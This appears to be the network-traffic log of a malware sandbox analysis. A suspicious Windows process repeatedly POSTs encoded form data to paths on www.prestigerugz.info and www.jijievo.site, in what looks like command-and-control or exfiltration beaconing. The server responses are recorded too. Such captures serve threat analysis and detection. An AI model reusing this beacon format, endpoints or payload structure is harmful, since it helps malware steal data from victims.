                                                                Dec 11, 2024 15:03:33.292740107 CET1236INData Raw: 37 34 20 34 33 30 2e 38 31 34 43 32 33 38 2e 32 20 33 36 34 2e 31 38 20 32 35 30 2e 37 36 31 20 32 38 37 2e 33 36 38 20 32 38 35 2e 32 32 38 20 32 35 39 2e 32 35 43 33 31 39 2e 36 39 36 20 32 33 31 2e 31 33 33 20 33 36 33 2e 30 31 38 20 32 36 32
                                                                Data Ascii: 74 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)">
                                                                Dec 11, 2024 15:03:33.292753935 CET1236INData Raw: 22 34 32 36 2e 31 34 32 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09
                                                                Data Ascii: "426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><
                                                                Dec 11, 2024 15:03:33.412276030 CET1236INData Raw: 62 75 74 20 74 68 65 20 73 69 74 65 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 61 6e 20 53 53 4c 20 63 65 72 74 69 66 69 63 61 74 65 20 69 6e 73 74 61 6c 6c 65 64 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 77 69
                                                                Data Ascii: but the site does not have an SSL certificate installed.</li><li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__acti


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.749859217.160.0.113804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:03:49.239543915 CET769OUTPOST /m5si/ HTTP/1.1
                                                                Host: www.prestigerugz.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.prestigerugz.info
                                                                Referer: http://www.prestigerugz.info/m5si/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2b 35 30 62 56 33 69 4b 49 77 73 5a 38 4e 54 4b 4c 6c 79 53 48 37 37 34 5a 4c 45 45 48 6e 4b 39 4a 31 36 50 50 6a 52 53 37 66 57 65 6c 7a 52 6c 48 58 49 54 70 71 37 69 72 6a 57 51 44 71 7a 4c 4e 49 36 61 6e 61 49 73 6c 6b 2f 37 38 7a 2f 50 74 76 54 79 79 63 52 67 70 6b 30 4b 73 55 35 59 38 78 75 36 7a 64 77 77 4c 76 6e 43 6d 34 32 79 63 4f 35 74 76 41 48 76 30 7a 71 66 32 69 33 37 63 75 31 39 48 72 55 43 4b 42 4f 4b 2b 69 61 35 7a 6d 44 67 7a 54 48 4d 46 74 32 32 33 67 74 58 57 64 67 30 6b 36 32 62 48 4a 32 59 76 77 4f 42 53 53 73 49 4e 4e 74 49 42 62 62 43 70 70 45 47 4d 77 7a 32 79 77 3d 3d
                                                                Data Ascii: 9rKHjDxP=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzTHMFt223gtXWdg0k62bHJ2YvwOBSSsINNtIBbbCppEGMwz2yw==
                                                                Dec 11, 2024 15:03:50.512629986 CET780INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Date: Wed, 11 Dec 2024 14:03:50 GMT
                                                                Server: Apache
                                                                X-Frame-Options: deny
                                                                Content-Encoding: gzip
                                                                Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.749868217.160.0.113804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:03:51.908502102 CET789OUTPOST /m5si/ HTTP/1.1
                                                                Host: www.prestigerugz.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.prestigerugz.info
                                                                Referer: http://www.prestigerugz.info/m5si/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2f 61 38 62 53 68 71 4b 4f 51 73 61 7a 74 54 4b 41 46 79 57 48 37 33 34 5a 4b 78 63 48 30 75 39 4a 56 4b 50 4f 67 4a 53 79 50 57 65 39 6a 52 67 4b 33 49 63 70 71 33 45 72 68 43 51 44 71 58 4c 4e 4a 71 61 6e 74 63 76 2f 55 2f 35 77 54 2f 4e 31 50 54 79 79 63 52 67 70 6b 77 77 73 55 68 59 38 69 6d 36 7a 38 77 7a 49 76 6e 42 33 34 32 79 4c 2b 35 70 76 41 48 64 30 79 6d 6c 32 67 2f 37 63 76 46 39 43 71 55 42 54 78 4f 41 36 69 62 6c 34 6c 65 4b 7a 43 76 33 4e 64 62 6a 2b 51 42 4e 58 72 68 57 2b 59 36 33 5a 59 4f 6a 72 79 71 33 46 30 78 39 50 4d 70 51 4d 35 76 6a 32 65 68 73 42 69 53 79 6b 41 33 6c 4f 6e 73 6e 67 62 55 4f 64 43 6a 78 6b 62 57 6c 6f 70 38 3d
                                                                Data Ascii: 9rKHjDxP=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0u9JVKPOgJSyPWe9jRgK3Icpq3ErhCQDqXLNJqantcv/U/5wT/N1PTyycRgpkwwsUhY8im6z8wzIvnB342yL+5pvAHd0yml2g/7cvF9CqUBTxOA6ibl4leKzCv3Ndbj+QBNXrhW+Y63ZYOjryq3F0x9PMpQM5vj2ehsBiSykA3lOnsngbUOdCjxkbWlop8=
                                                                Dec 11, 2024 15:03:53.179491043 CET780INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Date: Wed, 11 Dec 2024 14:03:52 GMT
                                                                Server: Apache
                                                                X-Frame-Options: deny
                                                                Content-Encoding: gzip
                                                                Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.749874217.160.0.113804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:03:54.575210094 CET1802OUTPOST /m5si/ HTTP/1.1
                                                                Host: www.prestigerugz.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.prestigerugz.info
                                                                Referer: http://www.prestigerugz.info/m5si/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2f 61 38 62 53 68 71 4b 4f 51 73 61 7a 74 54 4b 41 46 79 57 48 37 33 34 5a 4b 78 63 48 30 6d 39 4a 6b 71 50 50 42 4a 53 6f 50 57 65 6a 7a 52 68 4b 33 49 37 70 71 76 49 72 68 66 6c 44 6f 66 4c 4f 70 32 61 6c 63 63 76 78 6b 2f 35 74 6a 2f 49 74 76 53 71 79 63 42 6b 70 6c 41 77 73 55 68 59 38 69 4b 36 6b 39 77 7a 4f 76 6e 43 6d 34 32 32 63 4f 35 42 76 47 76 4e 30 79 7a 59 31 54 48 37 63 50 56 39 41 34 4d 42 4d 42 4f 47 39 69 62 74 34 6c 53 52 7a 43 7a 52 4e 66 36 2b 2b 54 52 4e 62 61 34 4c 36 72 33 76 50 4b 4b 58 76 51 2b 49 4c 58 74 70 4a 74 5a 48 46 70 54 47 30 64 74 47 42 30 32 49 67 33 32 48 5a 46 51 61 73 61 73 44 62 79 66 2f 35 61 4f 35 2f 70 61 61 6d 46 54 7a 64 50 72 38 46 75 61 78 32 4f 33 2f 6c 42 51 48 72 78 4f 49 4a 57 42 7a 5a 48 69 59 37 33 5a 4c 50 59 41 46 59 38 39 66 68 72 75 50 48 73 2b 36 6a 76 2b 42 4a 68 45 35 6a 36 75 5a 2f 63 59 7a 68 34 58 75 68 73 48 48 4a 38 4e 6e 4f 79 61 52 2b 78 74 34 6f 41 61 47 48 54 48 39 77 [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0m9JkqPPBJSoPWejzRhK3I7pqvIrhflDofLOp2alccvxk/5tj/ItvSqycBkplAwsUhY8iK6k9wzOvnCm422cO5BvGvN0yzY1TH7cPV9A4MBMBOG9ibt4lSRzCzRNf6++TRNba4L6r3vPKKXvQ+ILXtpJtZHFpTG0dtGB02Ig32HZFQasasDbyf/5aO5/paamFTzdPr8Fuax2O3/lBQHrxOIJWBzZHiY73ZLPYAFY89fhruPHs+6jv+BJhE5j6uZ/cYzh4XuhsHHJ8NnOyaR+xt4oAaGHTH9w3F4FSvgQ1VzSDwHQdgheeZfSU5J/PwwqCUkjauGJRd4ODRRyLSB5536O8m9UoyNjBubp2rWaLX/9nXdAtSFwOUqQLZwvwatfUGj+nE87YJ4d9b+21H77Cjy7GPw0kzWiFqBpTydfjjog9TOachnDbZq0Piutfd8WP7feuo02XD3XVu5hdNku+JZDcZ++kR3e2YbAMlEMvW/rvCRWdoexVFFtiRCH1WXDdTW2L4oFOhpkchpoVTpcfpKz9qnwzzu/tYNwWnQzHMtGBXutgMO9qN5xHabjxp1wvoXsrXnAMNE6Y25DcjCqCJjVz58JDZ1JhAY/ujTY9WfWQznQCJ6n36RWuIhVDwlTbKviDWHLlrCEWYVl6sNkne1EA2g7h06N7C63DzPeNIKM+K1R04fMa9m40I14OuwZNPo9R0P25bsnnhzw0BE0nJv4lp23DEgJ36l4rKSyvshwrtvm1WpnrcGfMb2voUeUkYzo7T9CmcGEEDCbrMuOcVBc84/c2RChDKZOcXeSBJpW/XGAeylFf8yoD6CuF7vZhFRb+hQkLj584KgfHmq/3/IdaW7JUMWAsMU5xbM1MkYgbpk0NMqrL3mNCzKC5yV6d+J34TetBHl7Qkbu287rvgHPWPUM44ZdgVZ2I2xyRzJfpGhtHEkQIlGzze2MdZAH62 [TRUNCATED]
                                                                Dec 11, 2024 15:03:55.941884995 CET780INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Date: Wed, 11 Dec 2024 14:03:55 GMT
                                                                Server: Apache
                                                                X-Frame-Options: deny
                                                                Content-Encoding: gzip
                                                                Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.749880217.160.0.113804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:03:57.225361109 CET499OUTGET /m5si/?9rKHjDxP=eqY3hh7t27bJ5LQcNwCEIywmzarZF02UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcn2k/dwiDu7fbQ4+QluVQl8FQgs02h3ek4MsPNmfC+au8Zmg3P0HGq0iPg&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.prestigerugz.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:03:58.500950098 CET1236INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Content-Length: 1271
                                                                Connection: close
                                                                Date: Wed, 11 Dec 2024 14:03:58 GMT
                                                                Server: Apache
                                                                X-Frame-Options: deny
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                Dec 11, 2024 15:03:58.500996113 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a
                                                                Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.749916154.90.58.209804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:13.146753073 CET754OUTPOST /521z/ HTTP/1.1
                                                                Host: www.jijievo.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.jijievo.site
                                                                Referer: http://www.jijievo.site/521z/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 37 48 2b 41 67 72 57 45 6d 38 79 2b 69 68 56 6f 35 51 61 2f 2b 65 63 36 73 51 6a 46 51 39 4e 6b 46 32 34 74 67 78 50 75 6f 79 50 78 46 74 34 4b 33 6c 42 73 32 6d 68 68 49 45 54 51 37 65 62 72 76 4a 48 34 42 59 73 55 4e 48 51 6f 48 59 2b 35 33 51 51 47 6c 51 7a 46 4b 74 61 7a 42 69 5a 4e 76 76 78 52 6f 34 78 77 4b 79 74 4a 63 43 74 35 36 7a 33 6f 6f 68 52 7a 46 5a 35 2f 2b 43 2b 45 35 56 6a 38 2b 66 58 52 41 54 4b 39 53 4c 39 45 7a 61 45 58 33 2b 68 74 5a 53 78 6e 71 78 57 2f 39 61 55 63 78 71 46 39 64 36 31 74 4c 49 61 6e 54 79 78 6f 45 52 31 79 58 2b 45 6f 5a 2f 37 35 44 54 69 58 56 51 3d 3d
                                                                Data Ascii: 9rKHjDxP=Vzfg0MdIUfpb7H+AgrWEm8y+ihVo5Qa/+ec6sQjFQ9NkF24tgxPuoyPxFt4K3lBs2mhhIETQ7ebrvJH4BYsUNHQoHY+53QQGlQzFKtazBiZNvvxRo4xwKytJcCt56z3oohRzFZ5/+C+E5Vj8+fXRATK9SL9EzaEX3+htZSxnqxW/9aUcxqF9d61tLIanTyxoER1yX+EoZ/75DTiXVQ==
                                                                Dec 11, 2024 15:04:14.755060911 CET241INHTTP/1.1 200 OK
                                                                Content-Encoding: gzip
                                                                Content-Type: text/html; charset=UTF-8
                                                                Date: Wed, 11 Dec 2024 14:04:14 GMT
                                                                Server: nginx
                                                                Vary: Accept-Encoding
                                                                Content-Length: 44
                                                                Connection: close
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                                Data Ascii: KLIU(WHO-QHKM.g


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.749926154.90.58.209804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:15.808640957 CET774OUTPOST /521z/ HTTP/1.1
                                                                Host: www.jijievo.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.jijievo.site
                                                                Referer: http://www.jijievo.site/521z/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 6c 6b 46 57 49 74 78 46 62 75 6c 53 50 78 4e 4e 34 50 7a 6c 42 6c 32 6d 74 44 49 41 50 51 37 65 50 72 76 4c 66 34 42 75 6b 56 4d 58 51 71 50 34 2b 37 36 77 51 47 6c 51 7a 46 4b 72 33 63 42 69 68 4e 75 66 42 52 70 61 5a 7a 57 43 74 49 55 69 74 35 73 7a 33 73 6f 68 51 6d 46 64 67 61 2b 41 57 45 35 58 72 38 2f 4f 58 53 4f 54 4b 37 64 72 38 4b 33 66 35 73 37 39 59 53 41 54 42 67 6c 6d 6d 44 78 4d 56 2b 72 49 4a 52 44 72 4e 57 50 4b 2b 52 45 55 73 64 47 51 78 71 61 63 77 4a 47 49 65 54 4f 42 44 54 44 74 4b 6f 58 50 6d 54 66 51 50 79 4b 66 38 79 68 63 45 41 53 69 6b 3d
                                                                Data Ascii: 9rKHjDxP=Vzfg0MdIUfpb6k2AtsqEu8y9uBVowwa7+eA6sU6aRIlkFWItxFbulSPxNN4PzlBl2mtDIAPQ7ePrvLf4BukVMXQqP4+76wQGlQzFKr3cBihNufBRpaZzWCtIUit5sz3sohQmFdga+AWE5Xr8/OXSOTK7dr8K3f5s79YSATBglmmDxMV+rIJRDrNWPK+REUsdGQxqacwJGIeTOBDTDtKoXPmTfQPyKf8yhcEASik=
                                                                Dec 11, 2024 15:04:17.411772013 CET241INHTTP/1.1 200 OK
                                                                Content-Encoding: gzip
                                                                Content-Type: text/html; charset=UTF-8
                                                                Date: Wed, 11 Dec 2024 14:04:17 GMT
                                                                Server: nginx
                                                                Vary: Accept-Encoding
                                                                Content-Length: 44
                                                                Connection: close
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                                Data Ascii: KLIU(WHO-QHKM.g


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.749933154.90.58.209804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
